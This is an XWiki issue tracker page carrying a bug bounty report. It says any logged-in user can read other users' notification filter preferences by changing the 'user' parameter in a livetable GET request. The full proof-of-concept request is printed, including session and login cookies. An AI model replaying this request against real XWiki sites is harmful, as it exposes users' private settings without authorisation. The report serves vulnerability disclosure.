Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-20336

Read notification filters of other users

    XMLWordPrintable

Details

    • Unknown
    • N/A

    Description

      SUBMISSION REFERENCES

      RESEARCHER INFORMATION

      • Submitter: bruhbey

      SUBMISSION INFORMATION

      • Created at: Thu, 03 Nov 2022 08:46:30 GMT
      • Submission status: Archived

      REPORT CONTENT

      Summary:

      • IDOR on notification filter

      Steps:

      • login your account
      • you can use this request to see other users notification filters (i think you can see who follows whose from there)

      GET /xwiki/bin/get/XWiki/Notifications/Code/NotificationFilterPreferenceLivetableResults?outputSyntax=plain&transprefix=notifications.settings.filters.preferences.custom.table.&classname=&collist=name%2CfilterType%2CeventTypes%2CnotificationFormats%2CisEnabled&queryFilters=currentlanguage%2Chidden&eventType=&format=&type=custom&user=xwiki:XWiki.username&offset=1&limit=10&reqNo=1 HTTP/1.1
      Host: intigriti.xwiki.com
      Connection: close
      Accept: text/javascript, text/html, application/xml, text/xml, /
      X-Prototype-Version: 1.7.3
      X-Requested-With: XMLHttpRequest
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
      Sec-Fetch-Site: same-origin
      Sec-Fetch-Mode: cors
      Sec-Fetch-Dest: empty
      Referer: https://intigriti.xwiki.com/xwiki/bin/view/XWiki/bruhboyitest
      Accept-Encoding: gzip, deflate
      Accept-Language: en-US,en;q=0.9
      Cookie: JSESSIONID=CE3E506BEFD1B5B0B49D533A3B374347; username="9c0MhyM7A8QmSdvO0VSFqQ_"; password="3zG4GTGXE6KBpi89DD8rzA_"; rememberme="false"; validation="d83cad3676f38d46129006f73ac6dea2"

      • you can simply change username to reproduce issue.If you go to victim's page,you are gonna see that you can not reach his notification,i am gonna show on poc video

      I will add poc video

      Thanks

      Attachments

        Issue Links

          is caused by

          Improvement - An improvement or enhancement to an existing feature or task. XWIKI-16158 Allow admin to access the notification preferences of other users

          • Major - Major loss of function.
          • Closed
          is related to

          Security - Security bug with confidential level XWIKI-20337 Delete/edit the custom filters of other users

          • Critical - Crashes, loss of data, severe memory leak.
          • Closed

          Activity

            People

              surli Simon Urli
              intigriti Intigriti Integration
              Votes:
              0 Vote for this issue
              Watchers:
              2 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: